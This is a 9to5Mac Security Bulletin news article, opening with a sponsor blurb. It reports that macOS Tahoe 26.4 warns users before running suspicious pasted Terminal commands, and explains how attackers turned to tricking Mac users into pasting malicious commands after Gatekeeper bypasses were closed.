9to5Mac Security Bulletin, Mosyle, the only Apple Unified Platform is presented exclusively. Our job is to make Apple devices ready and secure for work. Our unique integrated approach to management and security combines the latest Apple-specific security solutions with fully automated Hardening & Compliance, Next Generation EDR, AI-powered Zero Trust, and the most powerful and modern Apple MDM. As a result, we currently provide a fully automated Apple Unified Platform trusted by over 45,000 organizations, effortlessly and cost-effectively preparing millions of Apple devices for work.Request your EMPOWERED TRIAL today and understand that Mosyle has everything you need to work with Apple.

With the release of macOS 26.4, Apple warns users trying to paste malicious code into Terminal. This warning is a final blow against the new attack method that cybercriminals, who are actually more desperate, have turned to.

With the release of macOS Sonoma in 2023, Apple dealt a significant blow to the methods malware uses to bypass the built-in protection mechanism of the Mac, Gatekeeper. The update no longer allows users to right-click and open malicious applications that are unsigned and unapproved by Apple.

This was a harmful change for cybercriminals who relied on this popular transition method to infect Macs.

Cybercriminals quickly turned to a new social engineering tactic: tricking users into manually executing malicious commands in Terminal. You may have seen such attacks. I have also written about this topic many times in the Security Bulletin. A malicious application prompts the user to copy a command and paste it into Terminal.

This is a simple method but it works. And recently, it has been working a lot.

The attack actually succeeds in bypassing every layer of protection that Apple has integrated into macOS. Even Gatekeeper cannot protect you from yourself. The system sees this as a legitimate user action. You opened Terminal, pasted the command, and pressed Enter. From macOS's perspective, you intended to do this.

These attacks are typically carried out through malicious application downloads from fake websites, direct messages, and other distribution methods. Recently, I have encountered imitations of everything from OpenAI's Atlas browser to Google Chrome. The standards required to carry out such an attack are extremely low, which explains why it has become so attractive for threat actors who have lost the Gatekeeper bypass method.

But now Apple is trying to go further to protect users.

With macOS Tahoe 26.4, your Mac will now warn you when you paste Terminal commands copied from Safari or other applications and will flag anything that could harm your system. If macOS detects something suspicious, it will show a warning before executing the command, giving you a chance to stop and think before doing something irreversible.

Apple is once again going on the offensive here. A very small security change but a useful step that will protect the users who need it the most. For someone with little Mac knowledge following instructions from a malicious download, this could be the difference between being safe and being compromised.

Follow Arin Waichulis: LinkedIn, Threads, X

Subscribe to the 9to5Mac Security Bulletin Podcast for in-depth reviews and interviews with Apple security researchers and experts every two weeks:

  • Apple Podcasts
  • Spotify
  • Pocket Casts
  • RSS Feed